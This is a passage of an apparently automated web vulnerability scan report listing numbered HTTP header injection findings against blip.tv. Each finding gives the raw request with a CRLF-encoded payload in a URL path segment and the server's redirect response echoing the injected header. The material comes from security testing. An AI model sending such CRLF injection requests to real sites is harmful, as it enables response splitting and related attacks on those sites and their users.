Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/c374d
dd42cac7674
/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 375
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1248905106
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/c374d
dd42cac7674/Stup
...[SNIP]...

2.152. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload cddb8%0d%0ab6166b364cf was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/cddb8%0d%0ab6166b364cf HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/cddb8
b6166b364cf

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 1248905149
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/cddb8
b6166b364cf"
...[SNIP]...

2.153. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f10b%0d%0a51001ccf226 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f10b%0d%0a51001ccf226/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/3f10b
51001ccf226
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1025264822
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/3f10b
51001ccf226/get/VZW-O
...[SNIP]...

2.154. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b4092%0d%0a3b92220f3b6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b4092%0d%0a3b92220f3b6/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/b4092
3b92220f3b6
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 349
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1498214947
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b4092
3b92220f3b6/VZW-
...[SNIP]...

2.155. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload de003%0d%0a42b9ec182a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/de003%0d%0a42b9ec182a?source=2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/de003
42b9ec182a
?source=2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1498214992
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/de003
42b9ec182a?s
...[SNIP]...

2.156. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15ea0%0d%0ae3a498f2e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15ea0%0d%0ae3a498f2e9/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/15ea0
e3a498f2e9
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 353
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1025264990
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/15ea0
e3a498f2e9/get/VZW-Of
...[SNIP]...

2.157. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b0487%0d%0a02cb8e0b3b2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b0487%0d%0a02cb8e0b3b2/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/b0487
02cb8e0b3b2
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 340
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1274879957
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b0487
02cb8e0b3b2/VZW-
...[SNIP]...

2.158. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c4bba%0d%0a09ac88edd77 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/c4bba%0d%0a09ac88edd77 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/c4bba
09ac88edd77

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 344225290
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/c4bba
09ac88edd77"
...[SNIP]...

2.159. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39861%0d%0a701665a5f12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39861%0d%0a701665a5f12/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/39861
701665a5f12
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 2146043821
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/39861
701665a5f12/get/VZW-O
...[SNIP]...

2.160. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c8150%0d%0aa8ef03bb86d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/c8150%0d%0aa8ef03bb86d/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/c8150
a8ef03bb86d
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 355
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1498215037
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/c8150
a8ef03bb86d/VZW-
...[SNIP]...

2.161. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6c82d%0d%0a93977621bdf was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/6c82d%0d%0a93977621bdf HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/6c82d
93977621bdf

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1274880099
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/6c82d
93977621bdf"
...[SNIP]...

2.162. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b735a%0d%0a4b73dce7fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b735a%0d%0a4b73dce7fd6/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/b735a
4b73dce7fd6
/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:14 GMT
X-Varnish: 1025265053
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/b735a
4b73dce7fd6/get/VZW-O
...[SNIP]...

2.163. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c53d4%0d%0aaced57da6fc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/c53d4%0d%0aaced57da6fc/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/c53d4
aced57da6fc
/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 340
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1248903439
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/c53d4
aced57da6fc/VZW-
...[SNIP]...

2.164. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload fff71%0d%0a9caf11d87e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/fff71%0d%0a9caf11d87e HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/fff71
9caf11d87e

Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:15 GMT
X-Varnish: 1025265146
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/fff71
9caf11d87e">
...[SNIP]...

2.165. http://blip.tv/file/post/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/post/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1cec9%0d%0aaea8b0a57c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1cec9%0d%0aaea8b0a57c0/post/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/1cec9
aea8b0a57c0
/post/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1498217007
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/1cec9
aea8b0a57c0/post/">he
...[SNIP]...

2.166. http://blip.tv/file/post/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/post/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b447b%0d%0aae2ca8874c8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b447b%0d%0aae2ca8874c8/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/b447b
ae2ca8874c8
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:38:29 GMT
X-Varnish: 1025267076
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b447b
ae2ca8874c8/">he
...[SNIP]...

2.167. http://blip.tv/file/view/4639878 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/view/4639878

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b1a1%0d%0aafeb6bf68fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b1a1%0d%0aafeb6bf68fb/view/4639878 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/6b1a1
afeb6bf68fb
/view/4639878
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1248905621
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6b1a1
afeb6bf68fb/view/4639
...[SNIP]...

2.168. http://blip.tv/file/view/4639878 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/view/4639878

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5e398%0d%0afe6869b45b4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/5e398%0d%0afe6869b45b4/4639878 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/5e398
fe6869b45b4
/4639878
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1025267239
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/5e398
fe6869b45b4/4639
...[SNIP]...

2.169. http://blip.tv/file/view/4639878 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/view/4639878

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d28f4%0d%0adfc23e7d40b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/view/d28f4%0d%0adfc23e7d40b HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/view/d28f4
dfc23e7d40b

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1324527842
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/view/d28f4
dfc23e7d40b
...[SNIP]...

2.170. http://blip.tv/html5/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /html5/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5c5e%0d%0aecfd3e1b2e1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5c5e%0d%0aecfd3e1b2e1/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/a5c5e
ecfd3e1b2e1
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Date: Thu, 20 Jan 2011 00:39:03 GMT
X-Varnish: 1324533224
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/a5c5e
ecfd3e1b2e1/">here</a
...[SNIP]...

2.171. http://blip.tv/opensearch.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /opensearch.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9557%0d%0a1ccc7956757 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

